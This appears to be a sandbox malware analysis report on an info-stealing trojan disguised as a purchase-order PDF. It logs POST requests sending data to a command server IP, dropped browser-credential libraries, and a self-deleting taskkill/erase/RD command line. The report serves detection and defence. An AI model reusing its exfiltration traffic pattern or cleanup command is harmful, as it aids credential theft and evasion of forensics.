                    Source: global trafficHTTP traffic detected: POST /tsc//4.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 51.222.56.151Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                    Source: global trafficHTTP traffic detected: POST /tsc//5.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 51.222.56.151Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                    Source: global trafficHTTP traffic detected: POST /tsc//7.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 51.222.56.151Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                    Source: global trafficHTTP traffic detected: POST /tsc//main.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 51.222.56.151Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                    Source: global trafficHTTP traffic detected: POST /tsc/ HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 88084Host: 51.222.56.151Connection: Keep-AliveCache-Control: no-cache
                    Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 51.222.56.151
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_00421CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,_memcpy_s,_memcpy_s,1_2_00421CF0
                    Source: unknownHTTP traffic detected: POST /tsc//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 51.222.56.151Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                    Source: New Order PO2193570O1.pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                    Source: New Order PO2193570O1.pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: mozglue.dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://www.mozilla.com0
                    Source: temp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: temp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: temp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: temp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: temp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
                    Source: temp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: temp.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: temp.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219653561.0000000002980000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219653561.0000000002980000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: temp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405042

                    System Summary:

                    barindex
                    Initial sample is a PE file and has a suspicious nameShow sources
                    Source: initial sampleStatic PE information: Filename: New Order PO2193570O1.pdf.exe
                    Source: initial sampleStatic PE information: Filename: New Order PO2193570O1.pdf.exe
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040323C
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_004048530_2_00404853
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_004061310_2_00406131
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_709B1A980_2_709B1A98
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_004134801_2_00413480
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_00413C901_2_00413C90
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_004130601_2_00413060
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_00413AA01_2_00413AA0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_00404B101_2_00404B10
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_004134801_1_00413480
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_00413C901_1_00413C90
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_004130601_1_00413060
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_00413AA01_1_00413AA0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_00404B101_1_00404B10
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: String function: 0040B166 appears 46 times
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: String function: 00408C20 appears 82 times
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: String function: 00422F70 appears 782 times
                    Source: sqlite3.dll.1.drStatic PE information: Number of sections : 19 > 10
                    Source: New Order PO2193570O1.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: New Order PO2193570O1.pdf.exe, 00000000.00000003.197780337.0000000009986000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219800384.00000000030E0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll8 vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.211718078.0000000002987000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.205443188.0000000002981000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219222358.00000000022F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.220056999.0000000003490000.00000002.00000001.sdmpBinary or memory string: originalfilename vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.220056999.0000000003490000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219217298.00000000022E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000002.219185950.0000000002130000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.207750010.0000000002981000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.206441558.0000000002981000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs New Order PO2193570O1.pdf.exe
                    Source: New Order PO2193570O1.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/16@0/1
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404356
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_01
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nscEE2C.tmpJump to behavior
                    Source: New Order PO2193570O1.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 1124)
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.210423748.0000000003080000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.204591620.0000000002AD1000.00000004.00000001.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.210423748.0000000003080000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: New Order PO2193570O1.pdf.exe, 00000001.00000003.210423748.0000000003080000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile read: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe 'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe'
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess created: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe 'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe'
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 1124 & erase C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe & RD /S /Q C:\\ProgramData\\300337377349991\\* & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1124
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess created: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe 'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 1124 & erase C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe & RD /S /Q C:\\ProgramData\\300337377349991\\* & exitJump to behavior
